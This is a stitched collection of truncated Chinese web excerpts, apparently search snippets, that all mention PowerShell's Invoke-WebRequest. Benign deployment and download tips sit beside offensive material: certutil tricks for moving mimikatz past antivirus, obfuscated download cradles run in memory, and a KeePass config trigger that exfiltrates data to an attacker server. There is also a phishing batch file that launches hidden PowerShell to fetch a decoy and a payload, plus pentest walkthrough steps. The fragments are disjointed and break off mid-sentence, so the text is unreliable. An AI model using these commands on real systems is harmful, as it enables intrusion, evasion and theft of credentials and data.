在渗透测试中,在正常的传输通道被禁止时,我们时常会剑走偏锋,通过一些特殊的方法来进行文件的传输。这篇文章将会描述使用 PowerShell 下载文件的三种方法,并评估它们的优缺点。...测试环境主要是 Windows 10(x64) 的 PowerShell 5 和下载速度约为 3mb/s 的无线网络连接。...1.Invoke-WebRequest 说到使用 PowerShell 下载文件,最先想到的就是 Invoke-WebRequest 命令。...我观察到 HTTP 响应流先全部缓存到了内存中,一旦文件全部传输完毕,文件就会从内存中一下子转移到磁盘中。如果你要下载一个大文件,那么这种方式会造成巨大的性能问题和内存的损耗。...第二,就是使用上面提到的 -UseBasicParsing 参数,这样在 Invoke-WebRequest 请求完数据后,就不会调用 IE 去进行 DOM 树结果的解析,效率会提高不少。
是一个登陆框,使用弱口令和注入都无果。在网页中发现了 login as guest页面。 ? ? 留言中Hazard留言说思科路由器存在问题,并且附上了配置文件。我发现配置文件中含有三个加密的密码。...password 5我发现没有合适的在线解密网站,所以使用john神器进行爆破。 john –wordlist=rockyou.txt pass.txt,破解成功。 ? ?...上传至靶机,这里我使用了powershell 的Invoke-WebRequest从本机进行上传,前提是打开本机http服务,通过80端口进行传输。...使用./procdump.exe -mp 6804 导出对应的进程文件。 ?...使用administrator账户拿到shell。 ? 完成靶机渗透。 ? 其中使用evil-winrm.rb也可以拿shell,并且上传下载操作更方便。
"cmd.exe /C start http://localhost:8080" 完整脚本 以上是在用PowerShell部署到IIS时的关键命令,知道了这些就可以来写一个完整自动部署脚本了。...以部署ZKEACMS为例,创建一个名为ZKEACMS.ps1的文件,并将以下代码粘贴到文件中保存。...执行脚本 执行脚本的方式很简单,可以在PowerShell的控制台中直接使用脚本的名称即可(注意路径) ..../ZKEACMS.ps1 或者可以直接鼠标右键该脚本文件,然后选择菜单中的使用 PowerShell 运行 如果你的脚本在网络上,可以直接在控制台中使用以下脚本来运行而不用下载它,例如可以使用以下脚本来在线安装...ZKEACMS: @powershell -NoProfile -ExecutionPolicy unrestricted -Command "&([scriptblock]::Create((Invoke-WebRequest
certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...这里我上传图片测试能够上传成功 本地也能够下载下来,但是就是到靶机上下载不下来,这时候就可以使用certutil的encode和decode进行加解密。...我们知道在内网中需要用到内网代理,一般都会用到nps或者frp,但是如果碰到有杀软限制上传文件大小的情况,这时候我们就可以使用先用encode编码分块上传再使用decode解密。...检验SHA256 这里比较上传前后mimikatz.exe的MD5值 certutil配合powershell内存加载 这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程 首先修改...NETWEBOPENREAD .NET [Net.WebClient] + OpenRead method (PS3.0+)[*] MEMORY\PSWEBREQUEST PS Invoke-WebRequest
我们知道在内网中需要用到内网代理,一般都会用到nps或者frp,但是如果碰到有杀软限制上传文件大小的情况,这时候我们就可以使用先用encode编码分块上传再使用decode解密。...SHA256 //检验SHA256 这里比较上传前后mimikatz.exe的MD5值 ?...certutil配合powershell内存加载 这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程 首先修改powershell策略为可执行脚本 ?...下载powershell混淆框架并执行 Import-Module .\Invoke-CradleCrafter.ps1Invoke-CradleCrafter ?...NETWEBOPENREAD .NET [Net.WebClient] + OpenRead method (PS3.0+)[*] MEMORY\PSWEBREQUEST PS Invoke-WebRequest
(1) 对 KeePass 配置文件具有写入权限的攻击者KeePass.config.xml可以注入以下触发器,例如: D5prW87VRr65NO2xP5RIIg... -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here...,可以定义第二个操作来使用Powershell.exe和编码为exfiltrate XML 数据,base64例如: PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest...Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -
在使用 curl 时,可以采用 -u 加上用户名和密码,这个对应在 PowerShell 也就是不到 10 句话的事情 假定使用 curl 输入的是如下代码 curl -ulindexi:AP7doYUzM7WApXobRb7X9qgURCF...-T "E:\lindexi\doubi.exe" "https://blog.lindexi.com/artifactory/doubi.exe" 通过上面代码可以给我的存储服务上传文件 此时的 -...lindexi:AP7doYUzM7WApXobRb7X9qgURCF")) $Headers = @{ Authorization = "Basic $encodedAuthString" } Invoke-WebRequest...-%E5%AE%9E%E7%8E%B0-curl-%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%E9%80%BB%E8%...本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。
1万小时的锤炼是任何人从平凡变成超凡的必要条件。———— 马尔科姆·格拉德威尔 最近看到一个开源AI项目——FastGPT,感觉挺强大,准备部署到本地玩一玩。...中尝试使用 curl 命令下载文件时,PowerShell 实际上调用的是 Invoke-WebRequest cmdlet(因为 PowerShell 中 curl 是 Invoke-WebRequest...的别名) PowerShell 下载命令: Invoke-WebRequest -Uri "https://raw.githubusercontent.com/labring/FastGPT/main.../projects/app/data/config.json" -OutFile "config.json" Invoke-WebRequest -Uri "https://raw.githubusercontent.com...系统必须至少有这两类模型才能正常使用。 如果系统未正常跳转,可以在**账号-模型提供商**页面,进行模型配置。
在Windows系统中使用PowerShell部署爬虫自动化,通常涉及以下几个步骤:比如说安装必要的软(如Python、Chrome浏览器、ChromeDriver等),同时还要创建爬虫脚本(假设使用Python...那么在Windows系统中使用PowerShell部署爬虫自动化,如何对环境配置、脚本开发、任务调度和监控管理四个核心环节进行部署。...$driverVersion = (Invoke-RestMethod $driverUrl).Trim()Invoke-WebRequest "https://chromedriver.storage.googleapis.com...Invoke-WebRequest获取数据$response = Invoke-WebRequest -Uri $url -UseBasicParsing$content = $response.Content...# 每次请求间隔5秒3、验证Robots.txt:$robots = Invoke-WebRequest "https://target-site.com/robots.txt"if ($robots.Content
1.3从攻击者的HTTP服务器下载文件:PowerShell PowerShell 有一个名为 Invoke-WebRequest 的内置函数,可用于从 HTTP 服务器下载文件,如下所示: IWR -...,但通过使用 Invoke-Expression 函数,我们还可以使用 Invoke-Expression 将文件直接下载并执行到内存中: IEX(New-Object System.Net.WebClient...这不会将 EXE 文件下载并执行到内存中。 当PowerShell脚本被下载并直接执行到内存中时,它会将脚本加载到当前会话中,以便可以执行脚本函数。但是,由于执行策略,这可能会带来问题。...上传文件到攻击者的FTP服务器 当我们启动 FTP 服务器时,我们使用-w标志,它为任何登录用户提供写入权限。这允许我们使用PUT将文件上传到 FTP 服务器上。...现在,我们可以在Invoke-Rubeus函数加载到当前会话中时执行该函数,并使用该脚本,而无需将其下载到受害者上。
读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。...在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。...我们需要在bat中放几段拼接的powershell代码实现该功能: 作用是从指定地址下载与压缩包中相同的pdf诱饵文件,然后打开该诱饵以迷惑用户(蓝方)。...@echo off start /min powershell -exec bypass -w hidden -nop -c "invoke-webrequest -uri https://xxxxx/...\readme.pdf'; invoke-WebRequest -Uri 'https://xxxxx/down.php/98dddd1a37325a2db2e2b1d371912b3b.txt' -OutFile
例如,如果某个服务的配置文件具有可写权限,攻击者可以通过修改该配置文件来获取更高的权限。 漏洞评估 在进行漏洞评估时,PowerUp 可以作为一个有效的工具来评估系统的安全性。...使用 Find-UnquotedServicePath 函数可以检查这些注册表键: Find-UnquotedServicePath 5....安全性:在实际环境中使用这些技术时,要非常小心,避免对系统造成不必要的损害。 日志记录:操作过程中可能会生成大量的日志,确保你能够清理这些日志以避免留下痕迹。 希望这些示例代码和应用场景对你有所帮助!...使用方法 要使用 PowerUp,首先需要安装 PowerShell 并确保有足够的权限运行脚本。...以下是基本的使用步骤: 下载 PowerUp: Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit
代码运行在内存中可以不去接触磁盘 很多安全产品并不能监测到powershell的活动 cmd.exe通常被阻止运行,但是powershell不会。 ?...DownloadFile("http://10.0.0.10/nc.exe","nc.exe") Win 8及更高版本PowerShell Invoke-WebRequest (wget): wget...Invoke-DllInjection* 2. Invoke-ReflectivePEInjection 3. Invoke-Shellcode 4....Install-SSP 5....六、信息侦察(Recon) 这个文件夹主要是以目标主机为跳板进行内网主机侦察。
(2)powershell 文本内容: Invoke-WebRequest http://files.docking.org/2D/BA/BAAA.smi -OutFile BA/BAAA.smi Invoke-WebRequest...http://files.docking.org/2D/BA/BAAB.smi -OutFile BA/BAAB.smi Invoke-WebRequest http://files.docking.org.../2D/BA/BAAC.smi -OutFile BA/BAAC.smi Invoke-WebRequest http://files.docking.org/2D/BA/BAAD.smi -OutFile...打开powershell,将后缀为powershell的文件重命名为ps 1.然后再powershell模式下启动,命令行为 ....(5)database_index就是一个序列号,可能爬虫的话,可以按照这种方式下载。
sh 脚本 pwsh 使用 PowerShellCore 脚本 python 使用 python 命令 sh 使用 sh 命令 cmd 使用批处理脚本 powershell 使用 powershell.../dist.nuget.org/win-x86-commandline/latest/nuget.exe" $targetNugetExe = "nuget.exe" Invoke-WebRequest...$sourceNugetExe -OutFile $targetNugetExe shell: pwsh 使用 PowerShell 脚本下载 nuget 文件,因为 nuget 文件不需要加入环境变量...使用 nuget 用下面命令上传 nuget 文件 ..../dist.nuget.org/win-x86-commandline/latest/nuget.exe" $targetNugetExe = "nuget.exe" Invoke-WebRequest
調整 Windows Terminal 設定 請將 Windows PowerShell、PowerShell Core、WSL 的 外觀 (Appearance) 調整使用 CaskaydiaCove...(Invoke-WebRequest -Uri 'https://gist.githubusercontent.com/doggy8088/d3f3925452e2d7b923d01142f755d2ae...(Invoke-WebRequest -Uri 'https://gist.githubusercontent.com/doggy8088/2bf2a46f7e65ae4197b6092df3835f21.../raw/e5e73da6aabaf51ae49c641f5ca409f38f660443/$PROFILE_ArgumentCompleter.ps1').Content | Out-File -LiteralPath...(Invoke-WebRequest -Uri 'https://gist.githubusercontent.com/doggy8088/553c4548492b63e4ccbe30d843de85f6
适用于:Windows Server 2012,Windows 10 1.使用Certutil.exe下载文件,下载完成以后一定记得delete 清理痕迹。...C:\> certutil -hashfile lyshark.log MD5 MD5 的 lyshark.log 哈希: 6f5902ac237024bdd0c176cb93063dc4 3.还可以对指定文件进行编码...的内存加载功能,则可把certutil的功能发挥到极致,接下来先来下载一个PS的加载框架。...Y 2.使用方法,执行两条命令,加载框架。 PS C:\Invoke-CradleCrafter> Import-Module ....NETWEBOPENREAD .NET [Net.WebClient] + OpenRead method (PS3.0+) [*] MEMORY\PSWEBREQUEST PS Invoke-WebRequest
重建PDF时,使用ReportLab库来保持原文的排版和样式,包括字体、颜色、边框和页面边距等。...用户可以在配置文件中指定默认翻译引擎,或通过命令行参数在翻译时动态选择。...性能优化:使用多线程和异步IO来提高翻译速度,特别是在处理大型PDF文档时。缓存翻译结果和解析的PDF信息,以减少重复计算和提高效率。...-Command "& {Invoke-WebRequest -Uri !..._pth)cd pdf2zh_distif not exist Scripts/pip.exe ( powershell -Command "& {Invoke-WebRequest -Uri !
dha 尽管 OneDrive 会对所有上传的文件进行扫描,但 POLONIUM 并未使用 OneDrive 存储恶意软件,只是与合法用户相同的方式与云服务进行交互。 ...CreepyDrive CreepyDrive 利用 OneDrive 进行 C&C 通信,样本具备上传下载文件的基本功能。...CreepyDrive 的所有请求都使用 Invoke-WebRequest cmdlet。该样本一旦运行,就会持续工作。但该样本不包含持久化机制,如果终止就需要攻击者手动重启。...data.txt 文件指示恶意程序要执行的任务,主要是三个分支。 Upload 响应中为 Upload 时,触发该分支。还需要包含两个信息:要上传的本地文件路径、攻击者自定义的远程文件名。...Execute 未响应任何指令时,将进入该分支。响应中可以包含要执行的命令数组或先前下载文件的文件路径。攻击者也可以使用单命令与文件路径的组合。
调用-PSImage Invoke-PSImage接收一个PowerShell脚本,并将脚本的字节编码为PNG图像的像素。...它生成一个oneliner,用于从文件或从网络上执行。 它可以只使用有效载荷数据创建一个新的图像,也可以将有效载荷嵌入到现有图像的最不重要的字节中,使其看起来像一张实际的图片。...在创建新的图片时,普通的PowerShell脚本实际上被大大压缩了,通常生成的png的文件大小约为原始脚本的50%。...-WebRequest 使用 Net.WebClient 输出一个从网上读取图像的命令。你需要托管图像并将URL插入到命令中。...\kiwi.jpg -WebRequest [从网络上执行的Oneliner] 项目地址: https://github.com/peewpw/Invoke-PSImage ?